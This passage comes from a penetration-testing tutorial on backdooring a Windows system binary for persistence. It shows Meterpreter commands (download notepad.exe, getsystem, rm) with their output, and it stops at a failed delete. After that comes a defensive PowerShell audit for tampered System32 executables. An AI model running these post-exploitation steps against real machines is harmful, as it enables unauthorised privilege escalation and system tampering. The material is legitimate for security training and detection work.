Becoming TrustedInstaller
Another way to gain persistence is to backdoor a service binary. So, let's try to backdoor a Windows binary on the Windows 10 target machine.
How to do it...
- First, we will download notepad.exe to our Kali machine using the download command:
meterpreter > pwd
C:\Windows\system32
meterpreter > download notepad.exe
[*] Downloading: notepad.exe -> notepad.exe
[*] Downloaded 227.00 KiB of 227.00 KiB (100.0%): notepad.exe -> notepad.exe
[*] download : notepad.exe -> notepad.exe
meterpreter >
Note
Use the pwd command to make sure you are in the C:\Windows\system32 directory where notepad.exe is located. If not, use the cd command to change to the proper directory (don't forget to use double backslashes): C:\\Windows\\system32.
- Now that we have a copy of the binary, let's try to remove the original:
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > rm notepad.exe
[-] stdapi_fs_delete_file...
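From the defender's side, the failed delete above reflects that stock System32 binaries are owned by TrustedInstaller rather than SYSTEM, so a changed owner or a signature that no longer validates on one of them is a tamper indicator. The following PowerShell audit is an added example, not code from the book; the expected owner string and the System32 scope are assumptions about a default Windows 10 install.

```powershell
# Added example: flag System32 executables whose owner is not TrustedInstaller
# or whose Authenticode/catalog signature does not validate.
# Assumption: default owner string on a stock Windows 10 install.
$expectedOwner = 'NT SERVICE\TrustedInstaller'
$target        = Join-Path $env:windir 'System32'

$findings = Get-ChildItem -Path $target -Filter *.exe -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        try {
            $owner = (Get-Acl -LiteralPath $file.FullName -ErrorAction Stop).Owner
            $sig   = Get-AuthenticodeSignature -LiteralPath $file.FullName -ErrorAction Stop
        } catch {
            # Unreadable ACL or signature is itself worth a look; record and continue.
            [pscustomobject]@{
                Path      = $file.FullName
                Owner     = 'unreadable'
                Signature = 'unreadable'
                Modified  = $file.LastWriteTimeUtc
            }
            return
        }

        if ($owner -ne $expectedOwner -or $sig.Status -ne 'Valid') {
            [pscustomobject]@{
                Path      = $file.FullName
                Owner     = $owner
                Signature = $sig.Status
                Modified  = $file.LastWriteTimeUtc
            }
        }
    }

# Most recently modified first: a replaced binary usually has a fresh write time.
$findings | Sort-Object Modified -Descending | Format-Table -AutoSize
```

Run it from an elevated 64-bit PowerShell session. Third-party executables installed into System32 will also appear, so treat the output as a triage list and compare it against a known-good baseline of the same build.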